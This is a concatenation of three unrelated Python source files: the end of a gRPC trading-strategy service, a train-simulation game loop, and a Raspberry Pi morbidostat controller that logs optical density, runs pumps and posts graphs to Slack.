context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details("Mode {} doesn't exist".format(mode))
return emp.Empty()
def _run(self):
q = self._queue
while not self._stop:
try:
self._state.execute(q.get())
except commands.StopExecution:
break
def _load_state(self, session_id):
with open(paths.get_file_path(session_id, self._states_dir), 'rb') as f:
params = f.read()
state = controllable_pb2.ControllableState()
state.ParseFromString(params)
return state
def restore_state(self, session_id):
        # 1) create controllable (PROBLEM: need mode (from controllable?))
        # 2) call restore_state on it => this will restore its session_state
        # 3) load events from the events log and push them into the queue
        #    PROBLEM: we need the datetime (from controllable? => current_dt)
        # 4) start thread => this will start executing events in the queue
        # 5) the controllable must ignore "expired" events: events that have already been processed
state = self._load_state(session_id)
self._controllable = controllable = self._cbl_fty.get_controllable(state.mode)
        with open(paths.get_file_path('strategy', self._states_dir)) as f:  # assumes the strategy is stored as 'strategy' under the states dir
strategy = f.read()
controllable.restore_state(state, strategy)
# set run_state to recovering
controllable.run_state = controllable.recovering
log = events_log.get_events_log(state.mode)
events = log.read(session_id, controllable.current_dt)
# play all missed events since last checkpoint (controllable is in recovery mode)
perf_writer = self._perf_writer
frequency_filter = self._frequency_filter
state_storage = self._state_storage
# todo: need to handle all the event types
for evt_type, evt in events:
if evt_type == 'clock':
commands.ClockUpdate(
perf_writer,
controllable,
frequency_filter,
evt,
state_storage)()
elif evt_type == 'parameter':
commands.CapitalUpdate(controllable, evt)()
elif evt_type == 'broker':
pass # todo
else:
pass
@service_access.framework_only
def Stop(self, request, context):
#todo needs to liquidate positions and wipe the state.
# multiple steps to execute: place orders, wait for all of them
# to be executed, update performances, then return
self._stop = True
return emp.Empty()
@service_access.framework_only
def UpdateParameters(self, request, context):
self._queue.put(
commands.CapitalUpdate(
self._controllable,
request
)
)
return emp.Empty()
@service_access.framework_only
def UpdateAccount(self, request_iterator, context):
self._queue.put(
commands.AccountUpdate(
self._controllable,
self._load_broker_state(
request_iterator)
)
)
return emp.Empty()
def _load_broker_state(self, request_iterator):
b = b''
for chunk in request_iterator:
b += chunk.data
brk_state = broker_pb2.BrokerState()
brk_state.ParseFromString(b)
return brk_state
@service_access.framework_only
def ClockUpdate(self, request, context):
        '''Note: an update call might arrive while a previous step is still executing, so the update
        message is queued; a dedicated worker thread pulls commands from the queue and executes them
        in order.
        '''
# NOTE: use FixedBasisPointsSlippage for slippage simulation.
self._queue.put(
commands.ClockUpdate(
self._perf_writer,
self._controllable,
self._frequency_filter,
request,
self._state_storage
)
)
return emp.Empty()
# @service_access.framework_only
def Watch(self, request, context):
self._perf_writer.observe()
# @service_access.framework_only
def StopWatching(self, request, context):
self._perf_writer.stop_observing()
class Server(object):
def __init__(self):
self._event = threading.Event()
self._server = grpc.server(futures.ThreadPoolExecutor(10))
def start(self, controllable, url=None):
server = self._server
if not url:
port = server.add_insecure_port('localhost:0')
else:
port = server.add_insecure_port(url)
cbl_rpc.add_ControllableServicer_to_server(controllable, server)
print(port)
server.start()
self._event.wait()
controllable.stop()
        server.stop(None)  # grpc requires an explicit grace period; None aborts active RPCs immediately
def stop(self):
self._event.set()
_SERVER = Server()
def termination_handler(signum, frame):
_SERVER.stop()
def interruption_handler(signum, frame):
_SERVER.stop()
signal.signal(signal.SIGINT, interruption_handler)
signal.signal(signal.SIGTERM, termination_handler)
@click.group()
def cli():
pass
@cli.command()
@click.argument('framework_id')
@click.argument('framework_url')
@click.argument('session_id')
@click.argument('root_dir')
@click.option('-cu', '--controllable-url')
@click.option('--recovery', is_flag=True)
def start(framework_id, framework_url, session_id, root_dir, controllable_url, recovery):
    '''
    Parameters
    ----------
    framework_id : str
        identifier of the framework, used by the framework_only access checks
    framework_url : str
        url for callbacks to the framework
    session_id : str
        identifier of the session to run (and to restore in recovery mode)
    root_dir : str
        root directory handed to the stub directory
    controllable_url : str
        address this controllable's server binds to; a free local port is picked when omitted
    recovery : bool
        restore the controllable's saved state for the session before serving
    '''
# If the controllable fails, it will be relaunched by the controller.
# TODO: save the framework_url for future use. NOTE: the framework url must be immutable
# (is a service in kubernetes)
    # run forever or until an exception occurs, in which case send back a report to the controller
    # or write to a log file. If the strategy crashes internally, there might be some bug that
    # needs reviewing.
with directory.StubDirectory(root_dir) as d:
# set the framework_id if ran as a process
service_access._framework_id = framework_id
channel = grpc.insecure_channel(framework_url)
service = ControllableService(
itf_rpc.MonitorStub(channel),
factory.ControllableProcessFactory(channel),
d)
if recovery:
service.restore_state(session_id)
try:
_SERVER.start(
service,
controllable_url)
except Exception as e:
# todo: write to log?, send report to controller?
raise RuntimeError('Unexpected error', e)
if __name__ == '__main__':
cli()
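# Hypothetical invocation sketch. The module name and argument values below are assumptions for
# illustration only; the positional arguments map to framework_id, framework_url, session_id and
# root_dir as declared on the click command above, and --recovery restores saved state before serving.
#
#   python controllable_service.py start fw-1 framework.svc:50051 session-42 /var/pluto -cu 0.0.0.0:50052
#   python controllable_service.py start fw-1 framework.svc:50051 session-42 /var/pluto --recovery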
|
GameLoop.py
|
print("""\
mmm mmmm mmm mmmm mmmm mmmm
m" " #" " # # # " "# m" "m
# "#mmm # "mmmm" mmm" # m #
# "# # # "# "# # #
"mmm" "mmm#" mm#mm "#mmm" "mmm#" #mm#
""")
import sys, configparser
import time
from SimpleGUICS2Pygame import simplegui_lib_fps
from SimpleGUICS2Pygame import simpleguics2pygame
#LOADING SETTINGS
config = configparser.ConfigParser()
#Read the settings file
config.read_file(open('Classes/config'))
#Override settings when testing (to make it easier to run multiple instances)
if(len(sys.argv) > 1):
    print("OVERRIDING SETTINGS_________________________")
    config.set('NETWORKING', 'CONFIG_TYPE', sys.argv[1])
with open('Classes/config', "w") as conf:
config.write(conf)
#reopen
#config.read_file(open('Classes/config'))
# #LOAD INTERNAL CLASSES
# from Transfer.comms import communicate, recieve, ping
from Handlers.KeyHandler import keydown, keyup
from Handlers.ClickHandler import checkClick
from Loading.Objects import send_list
from Loading.Objects import *
from Loading.Objects import simTime
from GameStates.intro import introLoop, waitingLoop,storyLoop
from threading import Thread
#-----START----GAME----CLOCK
fps = simplegui_lib_fps.FPS()
fps.start()
#initiate Ai
# print("HERE")
# updateP=Thread(target=updatePeople)
# print("then here")
# updateP.start()
print("NOW Here ")
print("MONSTERS LOADED AND SPAWNED")
cwd=os.getcwd()
#--------------GAME-----LOOP-------------------
startTime=time.time()
currentTime=time.time()
def draw(canvas):
#========== GAME LOOPS NON MAIN =====================
# x,y=train.nextNode['lon'],train.nextNode['lat']
# pos=Vector(x,y).transformToCam(cam)
# canvas.draw_circle((pos.getX(),pos.getY()), 20, 2, 'Yellow')
if gameState1.main and gameState2.main:
# line.drawByName(canvas, cam, line_dict, way_dict, node_dict, 'Waterloo & City: Waterloo → Bank',
# 'blue')
autoCam.update(cam,train_dict)
# mapLoader.update((baseNode['lat'], baseNode['lon']), cam, spriteDictionary)
# mapLoader.draw(canvas, cam)
trainLoader.load(train_dict,spriteDictionary,relation_dict,line_dict,way_dict,node_dict,nodeTraffic_dict,variables['simulation_speed'])
global simTime,currentTime
simTime += (time.time() - currentTime) * variables['simulation_speed']
currentTime=time.time()
timeString="("+str(round(((simTime/60)/60)))+" : "+str(round((simTime/60)%60))+" : "+str(round(simTime%60,1))+")"
timeLable.set_text(timeString)
for trainId in train_dict:
train=train_dict[trainId]
train.update(nodeTraffic_dict,relation_dict,line_dict,way_dict,node_dict,variables['simulation_speed'])
# line.drawNodeList(canvas,cam,node_dict,all_stops)
# train.draw(canvas,cam,node_dict)
if train.send:
train.send=False
stopId=train.currentStop
stop=all_stops_dict[stopId]
stop['train']=train.encode()
stop['time']=simTime
send_list.append(stop)
# if train.remove:
# train.remove=False
# stopId = train.currentStop
# stop = all_stops_dict[stopId]
# stop['train'] = {}
# send_list.append(stop)
if len(send_list)>0:
with open(cwd + '/Loading/TrainLog', 'a+') as outfile:
for stop in send_list:
json.dump(stop,outfile)
outfile.write("\n")
send_list.clear()
numTrains.set_text('Number of Trains: '+str(len(train_dict)))
#======================== ===========================================
#================ CLICK HANDLER =================================
checkClick()
#================ CLICK HANDLER END =================================
#===================================================================
#================ DRAW AND UPDATES =================================
# -------UPDATE-AND-DRAW---OBJECTS---BY---LAYER---PRIORITY
# x,y=train.nextNode['lon'],train.nextNode['lat']
# pos=Vector(x,y).transformToCam(cam)
# canvas.draw_circle((pos.getX(),pos.getY()), 20, 2, 'Yellow')
# --------------- CONSTRUCT AND DRAW LINES FROM THE WAYS -------
# ========================================================================================
# ======================== CAMERA UPDATE ===============================================================
cam.move()
cam.zoom()
fps.draw_fct(canvas)
# ========================== CAMERA UPDATE END==============================================================
# ========================================================================================
# ========================== STATS DISPLAY ==============================================================
#DISPLAY STATS:
# life.set_text('CamX: ' + str(train.particle.pos))
##
## Init
##
frame = simpleguics2pygame.create_frame('Game', int(config['CANVAS']['CANVAS_WIDTH']), int(config['CANVAS']['CANVAS_HEIGHT']))
frame.set_canvas_background('Black')
#Labels
numTrains = frame.add_label('Number of Trains: '+str(len(train_dict)))
timeLabel = frame.add_label('Time: ')
rng = frame.add_label('Range: ')
arrows = frame.add_label('Arrows: ')
spells = frame.add_label('Spells: ')
remote = frame.add_label('Remote Addr: ' + config['NETWORKING']['client_ip'])
frame.set_draw_handler(draw)
frame.set_keydown_handler(keydown)
frame.set_keyup_handler(keyup)
frame.start()
|
master_slackv2.py
|
#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
# Needed for Slack Integration
import slack
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
mchan = config['MAIN']['slack_channel']
totsys = (''.join(config.sections())).count('EVE')
actsys = []
for sysiter in range(totsys):
if config['EVE' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
adc.append(ADS.ADS1015(i2c, address= add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address=add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
morbidostats.append([Morbidostat(sysnum, len(actsys), chips), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=mchan,
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting EVEs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
def i2c_controller():
while True:
        if len(i2c_q) == 0:
            time.sleep(0.05)
        else:
            if i2c_q[0][1] == 'O':
                morbidostats[int(i2c_q[0][0])][0].get_OD()
            elif i2c_q[0][1] == 'C':
                morbidostats[int(i2c_q[0][0])][0].control_alg()
            elif i2c_q[0][1] == 'T':
                temp_sensor_func()
            i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
odcsvs = []
pumpcsvs = []
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
plotter.Plotter(actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])
def slackresponder():
while True:
try:
events = slack_client.rtm_read()
for event in events:
for sysitr in range(len(morbidostats)):
sysnum = morbidostats[sysitr][1]
evename = 'EVE' + str(sysnum)
if (
event.get('channel') == chanid and
event.get('text') == evename and
event.get('thread_ts') == multits and
event.get('type') == 'message'
):
# print(event)
slack_client.chat_postMessage(
username = 'Multiplexer',
icon_url = config['MAIN']['multi_icon'],
channel=mchan,
text = 'Generating Graphs for ' + evename,
thread_ts= multits
)
morbidostats[sysitr][0].graphOD()
time.sleep(60)
except KeyboardInterrupt:
break
except Exception as e:
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = 'Slack Reponder *o*',
# thread_ts= multits
# )
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = e,
# thread_ts= multits
# )
pass
def temp_runner():
if config['MAIN'].getboolean('temp_sensor'):
while True:
i2c_q.append('TT')
time.sleep(3)
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
f = open(device_file, 'r')
lines = f.readlines()
f.close()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
        with open(device_file, 'r') as f:  # re-read the 1-wire slave file until the CRC line reads YES
            lines = f.readlines()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
class Morbidostat:
def __init__(self, sysnum, actsys, chips):
self.printing = False
self.sysnum = sysnum
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'EVE' + str(self.sysnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.sysstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.sysstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.sysstr].getfloat('OD_min')
self.OD_err = self.config[self.sysstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.sysstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.sysstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.sysstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.sysstr].getfloat('P_drug_times')
self.P_nut_times = self.config[self.sysstr].getfloat('P_nut_times')
self.P_waste_times = self.config[self.sysstr].getfloat('P_waste_times')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.sysstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
self.OD_av_length = self.config[self.sysstr].getint('OD_av_length')
# OD averaging buffer
self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.thresh_check = self.config[self.sysstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.drug_mass = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.sysstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
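        # Worked example (values assumed, not from the config): with time_between_pumps = 10 min and
        # time_between_ODs = 2 s, loops_between_pumps = (10*60)/2 = 300, so the control algorithm is
        # queued every 300 OD loops.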
# num_cham = 1 # number of morbidostat vials being used
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_LED_pins')
# P_fan_pins = self.config[self.sysstr].getint('P_fan_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in self.pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
self.init_time = datetime.now()
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
# self.slack_client = slack_client
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
global slack_client
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
        if self.root_dir[-1] == '/': self.root_dir = self.root_dir[:-1]
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
global slack_client
self.initalmessage = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
def get_OD(self):
# global i2c_lock
print_buffer = 0
# i2c_q.append(id)
# while i2c_q[0] is not id and not sum(i2c_lock):
# time.sleep(0.1)
# print_buffer += 1
# if print_buffer % 15 == 0:
# print ('[%s] {GetOD} Waiting for Locks...' % self.sysstr)
# print(i2c_q)
# if i2c_q[0] is id:
# i2c_lock[self.sysnum-1] = True
# time.sleep(0.05)
try:
if self.pipins:
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.P_LED_pins, GPIO.OUT)
GPIO.output(self.P_LED_pins,1)
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
GPIO.output(self.P_LED_pins,0)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
self.pins[self.P_LED_pins] = self.mcp.get_pin(self.P_LED_pins)
self.pins[self.P_LED_pins].direction = digitalio.Direction.OUTPUT
self.pins[self.P_LED_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
self.pins[self.P_LED_pins].value = False
except:
print ('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
pass
# i2c_lock[self.sysnum-1] = False
# i2c_q.pop(0)
self.avOD_buffer = self.avOD_buffer + [self.currOD]
self.avOD_buffer.pop(0)
self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
    def all_pump_off(self):
        if self.pipins:
            for i in self.pin_list:
                GPIO.output(i, 0)
        else:
            for i in self.pin_list:
                self.pins[i].value = False
        print('[%s] Turning off all pumps' % self.sysstr)
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.drug_mass]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.drug_mass]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
file.close()
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
file.close()
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
file.close()
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
file.close()
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
self.thread_locks['graphs'].acquire()
global graph_lock
global graph_q
id = str(self.sysnum)+'G'
graph_q.append(id)
time.sleep(0.1)
        while graph_q[0] != id:
            time.sleep(30)
        if graph_q[0] == id:
graph_lock[self.sysnum-1] = True
time.sleep(2)
print('[%s] Generating graph' % self.sysstr)
try:
global slack_client
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','drug_mass'
allconcs = allpumps[['drug_mass']]/12
allconcs.rename(columns={'drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='drug_mass',color='tab:orange',legend=False)
DM.set_ylabel(ylabel='Drug Concentration (ug/mL)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
pumpa = allpumps[['media','drug','waste']]
